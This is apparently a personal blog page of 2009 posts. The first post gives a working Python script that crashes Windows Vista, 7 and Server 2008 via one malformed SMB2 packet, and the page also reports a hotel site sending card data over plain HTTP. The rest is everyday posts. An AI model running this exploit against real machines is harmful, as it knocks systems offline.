Press "Enter" to skip to content

nuxx.net Posts

MS09-0??

As is normal for a Patch Tuesday, Microsoft released a bunch of patches. Unfortunately, none of them fix a vulnerability in SMB2 on Vista, 7, or Server 2008 which allows easy remote BSODs using a single packet. This code below, which works under Python 2.6 on Windows, was very slightly adapted from this post to Full Disclosure.

import socket
host = "127.0.0.1", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.send(buff)
s.close()

UPDATE: Microsoft has posted 975497 – Vulnerabilities in SMB Could Allow Remote Code Execution which states:

Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.

I’m not sure how they define attack, but that BSOD above sure looks like one and making something quick to hit whole subnets in a go would be trivial.

UPDATE 2: This was fixed on 13-Oct-2009 in MS09-050.

Leave a Comment

Pig In An… Alley?

This morning when pulling up to the post office at 22 Mile and VanDyke I noticed a pig laying in the alley behind the strip mall which Bone Appetite Pet Supplies. A few years ago I saw this same pig, but at that time it was just nosing around in the grass next to a sign saying that the pig is supposed to be there.

UPDATE: Since people have asked, yes, the pig was alive. It was breathing, but appeared to be sleeping. The bowl on the right contained a bit of bright yellow liquid, which I hope was some sort of nutritional supplement or the remains of food. If I’m remembering correctly the other bowl was empty.

Leave a Comment

Trash Picking Reason #2264584

This free shelf here is another reason why one shouldn’t be afraid to take their neighbor’s trash right off the pile. While walking Roxie last night we saw this white shoe organizer sitting in the trash. One of the assembly screws had broken through the top, as if someone had stepped on it.

One new hole, moving the screw, and some wood glue and a clamp to repair the ripped out piece, and it’s quite nice again. Sure, these only cost $10 – $15, but free (and one less in the landfill) is even better. I really like shelves like this, as they are great for organizing small tools on a workbench or desk surface. There’s already one on my basement workbench and another on Danielle’s desk. This one on the garage workbench rounds it out nicely.

Leave a Comment

Artificial Sweeteners and Overeating

I’ve read a few things hinting that artificial sweeteners such as Aspartame (NutraSweet) and Saccharin cause an insulin response, leading to blood sugar drop and often overeating. While I don’t know enough to say how true it is, these three articles seem to support this:

Effects of artificial sweeteners on insulin release and cationic fluxes in rat pancreatic islets.

[…] Sodium saccharin (1.0-10.0 mM), sodium cyclamate (5.0-10.0 mM), stevioside (1.0 mM) and acesulfame-K (1.0-15.0 mM), all of which display a bitter taste, augmented insulin release from islets incubated in the presence of 7.0 mM D-glucose. In contrast, aspartame (1.0-10.0 mM), which is devoid of bitter taste, failed to affect insulin secretion. […]

A role for sweet taste: Calorie predictive relations in energy regulation by rats.

[…] We found that reducing the correlation between sweet taste and the caloric content of foods using artificial sweeteners in rats resulted in increased caloric intake, increased body weight, and increased adiposity, as well as diminished caloric compensation and blunted thermic responses to sweet-tasting diets. These results suggest that consumption of products containing artificial sweeteners may lead to increased body weight and obesity by interfering with fundamental homeostatic, physiological processes. […]

Sweet taste receptor expressed in pancreatic beta-cells activates the calcium and cyclic AMP signaling systems and stimulates insulin secretion.

[…] In these cells, artificial sweeteners such as sucralose, succharin, and acesulfame-K increased insulin secretion and augmented secretion induced by glucose. […]

When I was rather young, eating anything containing NutraSweet would give me a pretty bad headache. While this doesn’t happen any more, I do wonder if it was related.

Leave a Comment

2009 Stony Creek XC Race

With today being the start of a long stretch of great weather, I set out to Stony Creek to watch Tailwind‘s 2009 Stony Creek XC race. Some friends were starting at 1pm, so leaving my house at noon I made quick work (for me) of the ~14.5 trip, arriving just before they started off. This route took me up to 24 Mile and Dequindre, along Parkdale, up to Letica drive, then east along there and Sheldon, into one of Stony Creek’s rear entrances, then around two-track to the trailhead.

Once at the race I mostly hung out with folks, then snapped a few occasional photos of people. I would have headed off into the woods to grab actual photos of people, but since I’d left the memory card at home, I was only able to grab a few frames. These ended up being the following images:

· Bob, getting ready for the 2009 Stony XC Race, while Robert from Tailwind explains some things.
· Bill passing a guy riding Aerospokes while going into his second lap of the 2009 Stony XC Race.
· Bob, crossing the line to start his second lap at the 2009 Stony XC Race.
· Mike, crossing the finish line at the end of the 2009 Stony XC Race.
· Bob, crossing the finish line at the 2009 Stony XC Race.

After the race I headed back home via a slightly different route, heading out the main Stony Creek entrance, up the Macomb Orchard Trail to 24 Mile and Dequindre, then back the normal route home.

End result was just barely over 29 miles in 2:00:06 on an absolutely glorious Sunday.

Leave a Comment

Garland Resort’s Website is Very Insecure

Next month I’m going to be attending a wedding at Garland Resort in Michigan’s northern Lower Peninsula. When reserving a hotel room there I noticed that not only was the reservation system using plain old http, the form which accepts a credit card number is insecure. It then again uses HTTP when submitting the form:

<form name='frmRes1' method='post' Action='CCard1.asp?IRM=yes&BtrvID=4249' onSubmit='return NextPage()'>

Here’s an excerpt from a network capture of me submitting a page full of garbage info:

POST http://65.123.67.67/irm/CCard1.asp?IRM=yes&BtrvID=4249 HTTP/1.1\r\n

Line-based text data: application/x-www-form-urlencoded
    [truncated] firstname=Test&phone1=987-555-1212&lastname=User&phone2=&address1=12345+No+Street&sob=WI&address2=&ccname=AMEX&city=Default&ccnum=1234567812345678&state=AZ&ccexp=01%2F12&zip=99901&cardid=555&country=&email=test%40example.com&pa

See that last line there? In case you don’t know, the & sign delineates the fields, and it’s a simple valuename=value pair. Therefore, ccnum=1234567812345678 is the garbage credit card number I submitted, cardid is the CVV2, ccexp is the expiration date, etc. This is very definitely not PCI compliant and is a thief’s dream if the victim were submitting this form across a sniffable public network.

Suffice to say, I phoned in my reservation. This is obviously not an ideal solution either, but at least I didn’t use that crap.

Leave a Comment

In The Face!

Please excuse the poor quality photo, but it’s hard to take a macro photo of one’s own lip.

Today while riding back towards Rochester along the Paint Creek Trail with Bob, Erik, and Kristi, just before getting to the Tienken Road crossing I crossed paths with a large insect. While hitting, inhaling, or simply swallowing bugs is pretty common during late-summer riding, this was different. As soon as the bug hit my face I instinctively closed my mouth, which apparently trapped it between my lips.

In between that time and when I was able to pull it off my face (seconds, really) three quick bites or stings were applied to my lip. I’m not completely sure what it was, but the spindly, leggy feeling between my fingers and multiple punctures in such a short time leads me to believe that it was a wasp. It could have been a black fly or deer fly but I’ve never known them to bite so quickly.

At first the pain was like a sharp, stabbing cut, bothersome enough that I needed to stop for a few moments. After that it went down a bit, and now is sting a deep ache, similar to both the pain of split open chapped lips and having bit one’s lip quite hard.

At least the ride tonight was really nice. We started out at Rochester Mills, then headed up Bald Mountain South Unit, rode most of the mountain bike trails, then (due to my misdirection) didn’t quite find the connector to the Lake Orion High School mountain bike trails before sunset threatened.

Leave a Comment